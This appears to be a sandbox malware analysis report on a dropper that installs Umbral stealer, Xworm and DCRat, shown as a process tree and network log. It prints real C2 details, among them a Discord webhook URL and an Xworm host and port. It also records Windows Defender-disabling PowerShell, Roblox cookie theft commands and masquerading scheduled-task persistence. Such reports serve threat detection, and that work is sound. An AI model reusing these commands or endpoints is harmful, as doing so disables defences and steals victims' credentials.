Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/05/2024, 20:41 UTC

General

  • Target

    3969991942bb5b6130977411ae258ab8.exe

  • Size

    19.8MB

  • MD5

    3969991942bb5b6130977411ae258ab8

  • SHA1

    c391e670488d73dc79c2acfab1e845d9c3e5227e

  • SHA256

    aec009724ba208376f91cbfafd60db1e965f9016f17f14bfb3b074dde1f6ae28

  • SHA512

    ce009d113cd85629cb744c0e30fecc9cb1f3bc353b546eab676604a3eec976c5f0dc60cb29b7f4841bb71bb7596128340d1b222408c9aeeb9f9671d1a1add00a

  • SSDEEP

    393216:O581WtclJGQ9GnlC58mn3yJQjNKlgtcTuOYTmWYlY5nGPEy+tj7NJX:OeWgdGnlCqm3vKCTmpY5Py+r

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ

Extracted

Family

xworm

C2

127.0.0.1:30683

operating-niger.gl.at.ply.gg:30683:30683

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • Process spawned unexpected child process 36 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • DCRat payload 3 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 8 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 36 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3969991942bb5b6130977411ae258ab8.exe
    "C:\Users\Admin\AppData\Local\Temp\3969991942bb5b6130977411ae258ab8.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1288
    • C:\Users\Admin\AppData\Roaming\Nursultan (17).exe
      "C:\Users\Admin\AppData\Roaming\Nursultan (17).exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2460
      • C:\Users\Admin\AppData\Roaming\Nursultan.exe
        "C:\Users\Admin\AppData\Roaming\Nursultan.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:5016
      • C:\Users\Admin\AppData\Roaming\LoaderMas.exe
        "C:\Users\Admin\AppData\Roaming\LoaderMas.exe"
        3⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1816
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\LoaderMas.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4396
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LoaderMas.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4136
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4220
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1056
    • C:\Users\Admin\AppData\Roaming\t.bat
      "C:\Users\Admin\AppData\Roaming\t.bat"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4552
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\perfdhcpSvc\LUps3wjkA6jhdk7xRy8J55z2u.vbe"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4920
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\perfdhcpSvc\mStUjP0ksX5N.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2796
          • C:\perfdhcpSvc\Chainprovider.exe
            "C:\perfdhcpSvc\Chainprovider.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Drops file in Windows directory
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4404
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OOOQfReeqn.bat"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1760
              • C:\Windows\system32\w32tm.exe
                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                7⤵
                  PID:1168
                • C:\perfdhcpSvc\StartMenuExperienceHost.exe
                  "C:\perfdhcpSvc\StartMenuExperienceHost.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4932
      • C:\Users\Admin\AppData\Roaming\Umbral.exe
        "C:\Users\Admin\AppData\Roaming\Umbral.exe"
        2⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3768
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2288
        • C:\Windows\SYSTEM32\attrib.exe
          "attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Umbral.exe"
          3⤵
          • Views/modifies file attributes
          PID:4464
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Umbral.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3212
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3692
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1516
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4324
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1272
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          3⤵
            PID:3704
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            3⤵
              PID:4776
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:960
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic" path win32_VideoController get name
              3⤵
              • Detects videocard installed
              PID:2068
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Umbral.exe" && pause
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4836
              • C:\Windows\system32\PING.EXE
                ping localhost
                4⤵
                • Runs ping.exe
                PID:3740
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\perfdhcpSvc\System.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1272
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\perfdhcpSvc\System.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1624
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\perfdhcpSvc\System.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4592
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Windows\bcastdvr\conhost.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1096
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\bcastdvr\conhost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:452
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Windows\bcastdvr\conhost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4908
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\perfdhcpSvc\OfficeClickToRun.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1144
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\perfdhcpSvc\OfficeClickToRun.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4040
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\perfdhcpSvc\OfficeClickToRun.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:3304
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Nurik\WmiPrvSE.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1368
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Nurik\WmiPrvSE.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:2220
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Nurik\WmiPrvSE.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:2900
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\perfdhcpSvc\StartMenuExperienceHost.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4956
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\perfdhcpSvc\StartMenuExperienceHost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:3368
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\perfdhcpSvc\StartMenuExperienceHost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:748
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4840
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:672
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:3240
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Windows\twain_32\StartMenuExperienceHost.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4220
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\twain_32\StartMenuExperienceHost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:840
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Windows\twain_32\StartMenuExperienceHost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4964
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\lsass.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4476
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\lsass.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:2896
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\lsass.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4488
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Nurik\RuntimeBroker.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:5100
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Nurik\RuntimeBroker.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:3772
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Nurik\RuntimeBroker.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4932
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Windows\IdentityCRL\lsass.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1584
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\lsass.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:460
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Windows\IdentityCRL\lsass.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1144
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Portable Devices\WmiPrvSE.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1172
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\WmiPrvSE.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4776
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\WmiPrvSE.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:2888
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Defender\it-IT\StartMenuExperienceHost.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:820
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\it-IT\StartMenuExperienceHost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4792
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Defender\it-IT\StartMenuExperienceHost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:2900

        Network

        • flag-us
          DNS
          154.239.44.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          154.239.44.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          105.83.221.88.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          105.83.221.88.in-addr.arpa
          IN PTR
          Response
          105.83.221.88.in-addr.arpa
          IN PTR
          a88-221-83-105deploystaticakamaitechnologiescom
        • flag-us
          DNS
          gstatic.com
          Umbral.exe
          Remote address:
          8.8.8.8:53
          Request
          gstatic.com
          IN A
          Response
          gstatic.com
          IN A
          172.217.16.227
        • flag-gb
          GET
          https://gstatic.com/generate_204
          Umbral.exe
          Remote address:
          172.217.16.227:443
          Request
          GET /generate_204 HTTP/1.1
          Host: gstatic.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 204 No Content
          Content-Length: 0
          Cross-Origin-Resource-Policy: cross-origin
          Date: Fri, 17 May 2024 20:41:15 GMT
          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        • flag-us
          DNS
          ip-api.com
          LoaderMas.exe
          Remote address:
          8.8.8.8:53
          Request
          ip-api.com
          IN A
          Response
          ip-api.com
          IN A
          208.95.112.1
        • flag-us
          GET
          http://ip-api.com/line/?fields=hosting
          Umbral.exe
          Remote address:
          208.95.112.1:80
          Request
          GET /line/?fields=hosting HTTP/1.1
          Host: ip-api.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Date: Fri, 17 May 2024 20:41:15 GMT
          Content-Type: text/plain; charset=utf-8
          Content-Length: 6
          Access-Control-Allow-Origin: *
          X-Ttl: 32
          X-Rl: 42
        • flag-us
          DNS
          227.16.217.172.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          227.16.217.172.in-addr.arpa
          IN PTR
          Response
          227.16.217.172.in-addr.arpa
          IN PTR
          mad08s04-in-f31e100net
          227.16.217.172.in-addr.arpa
          IN PTR
          lhr48s28-in-f3�H
        • flag-us
          DNS
          1.112.95.208.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          1.112.95.208.in-addr.arpa
          IN PTR
          Response
          1.112.95.208.in-addr.arpa
          IN PTR
          ip-apicom
        • flag-us
          DNS
          76.32.126.40.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          76.32.126.40.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          97.17.167.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          97.17.167.52.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          ip-api.com
          LoaderMas.exe
          Remote address:
          8.8.8.8:53
          Request
          ip-api.com
          IN A
          Response
          ip-api.com
          IN A
          208.95.112.1
        • flag-us
          GET
          http://ip-api.com/line/?fields=hosting
          LoaderMas.exe
          Remote address:
          208.95.112.1:80
          Request
          GET /line/?fields=hosting HTTP/1.1
          Host: ip-api.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Date: Fri, 17 May 2024 20:41:21 GMT
          Content-Type: text/plain; charset=utf-8
          Content-Length: 6
          Access-Control-Allow-Origin: *
          X-Ttl: 27
          X-Rl: 39
        • flag-us
          GET
          http://ip-api.com/json/?fields=225545
          Umbral.exe
          Remote address:
          208.95.112.1:80
          Request
          GET /json/?fields=225545 HTTP/1.1
          Host: ip-api.com
          Response
          HTTP/1.1 200 OK
          Date: Fri, 17 May 2024 20:41:26 GMT
          Content-Type: application/json; charset=utf-8
          Content-Length: 163
          Access-Control-Allow-Origin: *
          X-Ttl: 23
          X-Rl: 37
        • flag-us
          DNS
          g.bing.com
          Remote address:
          8.8.8.8:53
          Request
          g.bing.com
          IN A
          Response
          g.bing.com
          IN CNAME
          g-bing-com.dual-a-0034.a-msedge.net
          g-bing-com.dual-a-0034.a-msedge.net
          IN CNAME
          dual-a-0034.a-msedge.net
          dual-a-0034.a-msedge.net
          IN A
          204.79.197.237
          dual-a-0034.a-msedge.net
          IN A
          13.107.21.237
        • flag-us
          GET
          https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=
          Remote address:
          204.79.197.237:443
          Request
          GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid= HTTP/2.0
          host: g.bing.com
          accept-encoding: gzip, deflate
          user-agent: WindowsShellClient/9.0.40929.0 (Windows)
          Response
          HTTP/2.0 204
          cache-control: no-cache, must-revalidate
          pragma: no-cache
          expires: Fri, 01 Jan 1990 00:00:00 GMT
          set-cookie: MUID=3B0A0F1575376C95179F1B9774D76DDA; domain=.bing.com; expires=Wed, 11-Jun-2025 20:41:26 GMT; path=/; SameSite=None; Secure; Priority=High;
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          access-control-allow-origin: *
          x-cache: CONFIG_NOCACHE
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          x-msedge-ref: Ref A: 608D481C766A42AB982DA35551B48144 Ref B: LON04EDGE1211 Ref C: 2024-05-17T20:41:26Z
          date: Fri, 17 May 2024 20:41:26 GMT
        • flag-us
          GET
          https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=
          Remote address:
          204.79.197.237:443
          Request
          GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid= HTTP/2.0
          host: g.bing.com
          accept-encoding: gzip, deflate
          user-agent: WindowsShellClient/9.0.40929.0 (Windows)
          cookie: MUID=3B0A0F1575376C95179F1B9774D76DDA
          Response
          HTTP/2.0 204
          cache-control: no-cache, must-revalidate
          pragma: no-cache
          expires: Fri, 01 Jan 1990 00:00:00 GMT
          set-cookie: MSPTC=Wbl7qRrr9oHR3dLn--kdfNrAbX_j2225WJUFnGXmoSQ; domain=.bing.com; expires=Wed, 11-Jun-2025 20:41:26 GMT; path=/; Partitioned; secure; SameSite=None
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          access-control-allow-origin: *
          x-cache: CONFIG_NOCACHE
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          x-msedge-ref: Ref A: 9160C45EBCFF4A4A8A49B96491CF4514 Ref B: LON04EDGE1211 Ref C: 2024-05-17T20:41:26Z
          date: Fri, 17 May 2024 20:41:26 GMT
        • flag-us
          GET
          https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=
          Remote address:
          204.79.197.237:443
          Request
          GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid= HTTP/2.0
          host: g.bing.com
          accept-encoding: gzip, deflate
          user-agent: WindowsShellClient/9.0.40929.0 (Windows)
          cookie: MUID=3B0A0F1575376C95179F1B9774D76DDA; MSPTC=Wbl7qRrr9oHR3dLn--kdfNrAbX_j2225WJUFnGXmoSQ
          Response
          HTTP/2.0 204
          cache-control: no-cache, must-revalidate
          pragma: no-cache
          expires: Fri, 01 Jan 1990 00:00:00 GMT
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          access-control-allow-origin: *
          x-cache: CONFIG_NOCACHE
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          x-msedge-ref: Ref A: 78AAE2FFA7E04F88977986C529109970 Ref B: LON04EDGE1211 Ref C: 2024-05-17T20:41:26Z
          date: Fri, 17 May 2024 20:41:26 GMT
        • flag-us
          DNS
          237.197.79.204.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          237.197.79.204.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          discord.com
          Umbral.exe
          Remote address:
          8.8.8.8:53
          Request
          discord.com
          IN A
          Response
          discord.com
          IN A
          162.159.128.233
          discord.com
          IN A
          162.159.135.232
          discord.com
